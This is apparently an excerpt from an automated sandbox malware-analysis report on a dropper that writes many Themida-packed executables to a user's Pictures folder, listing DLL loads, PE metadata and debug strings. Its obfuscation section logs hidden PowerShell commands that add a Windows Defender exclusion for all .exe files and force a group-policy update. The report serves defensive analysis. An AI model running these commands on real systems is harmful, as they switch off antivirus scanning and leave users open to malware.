                  Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exeSection loaded: windows.staterepositoryps.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exeSection loaded: edputil.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exeSection loaded: appresolver.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exeSection loaded: bcp47langs.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exeSection loaded: slc.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exeSection loaded: sppc.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exeSection loaded: onecorecommonproxystub.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exeSection loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exeSection loaded: pcacli.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exeSection loaded: drprov.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exeSection loaded: winsta.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exeSection loaded: ntlanman.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exeSection loaded: davclnt.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exeSection loaded: davhlpr.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: acgenral.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmm.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: samcli.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msacm32.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: version.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dwmapi.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: aclayers.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dll
                  Source: C:\Windows\SysWOW64\forfiles.exeSection loaded: apphelp.dll
                  Source: C:\Windows\SysWOW64\forfiles.exeSection loaded: version.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: fhsvc.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wtsapi32.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msidle.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: winsta.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: fhcfg.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wevtapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: efsutil.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: netapi32.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncasvc.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: httpprxp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wpdbusenum.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: portabledeviceapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: portabledeviceconnectapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wtsapi32.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: winsta.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: w32time.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: logoncli.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: vmictimeprovider.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: vmictimeprovider.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: vmictimeprovider.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: vmictimeprovider.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: vmictimeprovider.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: vmictimeprovider.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: vmictimeprovider.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: vmictimeprovider.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: vmictimeprovider.dll
                  Source: C:\Windows\SysWOW64\forfiles.exeSection loaded: apphelp.dll
                  Source: C:\Windows\SysWOW64\forfiles.exeSection loaded: version.dll
                  Source: C:\Windows\SysWOW64\forfiles.exeSection loaded: apphelp.dll
                  Source: C:\Windows\SysWOW64\forfiles.exeSection loaded: version.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9ac9fbe1-e0a2-4ad6-b4ee-e212013ea917}\InProcServer32Jump to behavior
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeFile written: C:\Users\user\AppData\Local\Temp\!@tA09A.tmp.dir\setup.iniJump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: lgX7lgUL1w.exeStatic PE information: Image base 0x140000000 > 0x60000000
                  Source: lgX7lgUL1w.exeStatic file information: File size 1843424 > 1048576
                  Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                  Source: lgX7lgUL1w.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: lgX7lgUL1w.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: lgX7lgUL1w.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: lgX7lgUL1w.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: lgX7lgUL1w.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: lgX7lgUL1w.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: lgX7lgUL1w.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: lgX7lgUL1w.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1460357142.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1457134681.0000000004DC2000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1458012640.0000000004D51000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1462785010.000000000515A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: Z:\Development\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\x64\Release\XBundlerTlsHelper.pdb source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000000.1290598899.00000001409DF000.00000080.00000001.01000000.0000000E.sdmp
                  Source: Binary string: C:\vmagent_new\bin\joblist\806392\out\Release\Installer.pdb source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1334164364.0000000004E44000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1335128422.0000000004F05000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: bash.pdbGCTL source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: bash.pdb source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: notepad.pdbGCTL source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: notepad.pdb source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb! source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000000.1290598899.0000000140BB1000.00000080.00000001.01000000.0000000E.sdmp
                  Source: Binary string: auditpol.pdbGCTL source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: c:\constructicon\builds\gfx\three\20.10\drivers\2d\dal\eeu\atieah\build\wNow64a\B_rel\atieah64.pdb source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000000.1290598899.0000000140BB1000.00000080.00000001.01000000.0000000E.sdmp
                  Source: Binary string: F:\workspace\_work\1\s\artifacts\obj\win-x64.Release\corehost\cli\apphost\Release\apphost.pdbhhh source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1420338649.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1426212707.0000000004460000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1426427943.0000000004461000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1420528579.0000000004FA0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: F:\workspace\_work\1\s\artifacts\obj\win-x64.Release\corehost\cli\apphost\Release\apphost.pdb source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1420338649.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1426212707.0000000004460000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1426427943.0000000004461000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1420528579.0000000004FA0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\vmagent_new\bin\joblist\615425\out\Release\360Installer.pdb0pH| source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000000.1257115899.0000000000471000.00000002.00000001.01000000.00000006.sdmp
                  Source: Binary string: auditpol.pdb source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\vmagent_new\bin\joblist\615425\out\Release\360Installer.pdb source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000000.1257115899.0000000000471000.00000002.00000001.01000000.00000006.sdmp
                  Source: lgX7lgUL1w.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: lgX7lgUL1w.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: lgX7lgUL1w.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: lgX7lgUL1w.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: lgX7lgUL1w.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                  Data Obfuscation

                  barindex
                  Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exeUnpacked PE file: 8.2.PZ3hKWPffUrXuh6Gjn77Ivv1.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
                  Source: C:\Users\user\Pictures\E6ijlcXzCqRG7r61JO0b9evs.exeUnpacked PE file: 38.2.E6ijlcXzCqRG7r61JO0b9evs.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell start-process -WindowStyle Hidden gpupdate.exe /force
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell start-process -WindowStyle Hidden gpupdate.exe /force
                  Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exeCode function: 18_2_00418320 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,18_2_00418320
                  Source: initial sampleStatic PE information: section where entry point is pointing to: .themida
                  Source: lgX7lgUL1w.exeStatic PE information: section name: .managed
                  Source: lgX7lgUL1w.exeStatic PE information: section name: hydrated
                  Source: lgX7lgUL1w.exeStatic PE information: section name: _RDATA
                  Source: lgX7lgUL1w.exe.0.drStatic PE information: section name: .managed
                  Source: lgX7lgUL1w.exe.0.drStatic PE information: section name: hydrated
                  Source: lgX7lgUL1w.exe.0.drStatic PE information: section name: _RDATA
                  Source: DYOHZPW0D22LInRRNxYgymyV.exe.5.drStatic PE information: section name:
                  Source: DYOHZPW0D22LInRRNxYgymyV.exe.5.drStatic PE information: section name:
                  Source: DYOHZPW0D22LInRRNxYgymyV.exe.5.drStatic PE information: section name: .themida
                  Source: EXHYoUWbk2EtGfzPiFxOh4fX.exe.5.drStatic PE information: section name: .sxdata
                  Source: PBZVagSpvy50LOBQHCjW6qX9.exe.5.drStatic PE information: section name:
                  Source: PBZVagSpvy50LOBQHCjW6qX9.exe.5.drStatic PE information: section name:
                  Source: PBZVagSpvy50LOBQHCjW6qX9.exe.5.drStatic PE information: section name: .themida
                  Source: o3bvuCFHWJf8oEmP3T0jhkMM.exe.5.drStatic PE information: section name: .sxdata
                  Source: JRER40VeoC2Q4ducOjAkB8be.exe.5.drStatic PE information: section name:
                  Source: JRER40VeoC2Q4ducOjAkB8be.exe.5.drStatic PE information: section name:
                  Source: JRER40VeoC2Q4ducOjAkB8be.exe.5.drStatic PE information: section name: .themida
                  Source: iYU7jmLL0jPLxgjctxjq1ReZ.exe.5.drStatic PE information: section name: .sxdata
                  Source: 2nhKzHIgDWCzStH9EAQv4dqj.exe.5.drStatic PE information: section name:
                  Source: 2nhKzHIgDWCzStH9EAQv4dqj.exe.5.drStatic PE information: section name:
                  Source: 2nhKzHIgDWCzStH9EAQv4dqj.exe.5.drStatic PE information: section name: .themida
                  Source: gsV4lhPLd9AgpTxUWWWokC1J.exe.5.drStatic PE information: section name: .sxdata
                  Source: oZEH3cHEU5SysFjbUbbRDrah.exe.5.drStatic PE information: section name:
                  Source: oZEH3cHEU5SysFjbUbbRDrah.exe.5.drStatic PE information: section name:
                  Source: oZEH3cHEU5SysFjbUbbRDrah.exe.5.drStatic PE information: section name: .themida
                  Source: M5ZhHB9e1LKNIZlvmmjrpriI.exe.5.drStatic PE information: section name:
                  Source: M5ZhHB9e1LKNIZlvmmjrpriI.exe.5.drStatic PE information: section name:
                  Source: M5ZhHB9e1LKNIZlvmmjrpriI.exe.5.drStatic PE information: section name: .themida
                  Source: oabRgCI78gjFIFXr0JEwCrFT.exe.5.drStatic PE information: section name:
                  Source: oabRgCI78gjFIFXr0JEwCrFT.exe.5.drStatic PE information: section name:
                  Source: oabRgCI78gjFIFXr0JEwCrFT.exe.5.drStatic PE information: section name: .themida
                  Source: rCs1RclDFMYQLymrwE3zboPd.exe.5.drStatic PE information: section name: .sxdata
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe.5.drStatic PE information: section name:
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe.5.drStatic PE information: section name:
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe.5.drStatic PE information: section name: .themida
                  Source: PkqGBlFfXQGSePxTvCIfv7cw.exe.5.drStatic PE information: section name: .sxdata
                  Source: gX97xQ1DxOEiWzmKIb4DOJWg.exe.5.drStatic PE information: section name: .sxdata
                  Source: xCvbsgibKaoe0JrKdFZUHTO3.exe.5.drStatic PE information: section name:
                  Source: xCvbsgibKaoe0JrKdFZUHTO3.exe.5.drStatic PE information: section name:
                  Source: xCvbsgibKaoe0JrKdFZUHTO3.exe.5.drStatic PE information: section name: .themida
                  Source: KFwijURKZUrjToqwGsuVqcsD.exe.5.drStatic PE information: section name: .sxdata
                  Source: aqGWEPmkK0B9sJyfEBtpOpuJ.exe.5.drStatic PE information: section name:
                  Source: aqGWEPmkK0B9sJyfEBtpOpuJ.exe.5.drStatic PE information: section name:
                  Source: aqGWEPmkK0B9sJyfEBtpOpuJ.exe.5.drStatic PE information: section name: .themida
                  Source: 04MMWMll6oQNYP44niQAKG8f.exe.5.drStatic PE information: section name:
                  Source: 04MMWMll6oQNYP44niQAKG8f.exe.5.drStatic PE information: section name:
                  Source: 04MMWMll6oQNYP44niQAKG8f.exe.5.drStatic PE information: section name: .themida
                  Source: JRzNWYaVkGhoqBVKINyNWHZb.exe.5.drStatic PE information: section name: .sxdata
                  Source: VEH3hOo7SH8Curivn14XA2XL.exe.5.drStatic PE information: section name:
                  Source: VEH3hOo7SH8Curivn14XA2XL.exe.5.drStatic PE information: section name:
                  Source: VEH3hOo7SH8Curivn14XA2XL.exe.5.drStatic PE information: section name: .themida
                  Source: zl9WjeKTxMy8k8EbTBZdpElC.exe.5.drStatic PE information: section name: .sxdata
                  Source: z7qYuSNnmN1T20mVDPQyJKNf.exe.5.drStatic PE information: section name:
                  Source: z7qYuSNnmN1T20mVDPQyJKNf.exe.5.drStatic PE information: section name:
                  Source: z7qYuSNnmN1T20mVDPQyJKNf.exe.5.drStatic PE information: section name: .themida
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeCode function: 7_3_04D8E613 push ecx; retf 7_3_04D8E61B
                  Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exeCode function: 8_2_00402CD7 push cs; retf 8_2_00402CD8
                  Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exeCode function: 8_2_00401EA7 push 0000000Eh; retf 0038h8_2_00401EB6
                  Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exeCode function: 8_2_004033B6 push eax; ret 8_2_00403419
                  Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exeCode function: 8_2_02E12D3E push cs; retf 8_2_02E12D3F
                  Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exeCode function: 8_2_02E11F0E push 0000000Eh; retf 0038h8_2_02E11F1D
                  Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exeCode function: 8_2_0302391F push ss; iretw 8_2_03023931
                  Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exeCode function: 8_2_03024934 push cs; retf 8_2_03024935
                  Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exeCode function: 8_2_03023D52 push cs; retf 0038h8_2_03023DD1
                  Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exeCode function: 8_2_03024FA8 push eax; ret 8_2_03024FA9
                  Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exeCode function: 8_2_03023DC2 push 0000000Eh; retf 0038h8_2_03023DD1
                  Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exeCode function: 8_2_03029DFE push 0000002Ah; iretd 8_2_03029E48
                  Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exeCode function: 18_2_00411360 push ecx; mov dword ptr [esp], ecx18_2_00411361
                  Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exeCode function: 18_2_00413954 push eax; ret 18_2_00413972
                  Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exeCode function: 18_2_00413CC0 push eax; ret 18_2_00413CEE
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeCode function: 19_3_044174C2 push 0040E81Ch; ret 19_3_04417654
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeCode function: 19_3_044174E0 push 0040E81Ch; ret 19_3_04417654
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeCode function: 19_3_04421498 push ecx; mov dword ptr [esp], ecx19_3_0442149B
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeCode function: 19_3_044214B8 push ecx; mov dword ptr [esp], ecx19_3_044214BB
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeCode function: 19_3_0441064C push ecx; mov dword ptr [esp], eax19_3_0441064D
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeCode function: 19_3_0441765E push 0040E88Fh; ret 19_3_044176C7
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeCode function: 19_3_04417660 push 0040E88Fh; ret 19_3_044176C7
                  Source: DYOHZPW0D22LInRRNxYgymyV.exe.5.drStatic PE information: section name: entropy: 7.284719044401107
                  Source: PBZVagSpvy50LOBQHCjW6qX9.exe.5.drStatic PE information: section name: entropy: 7.284719044401107
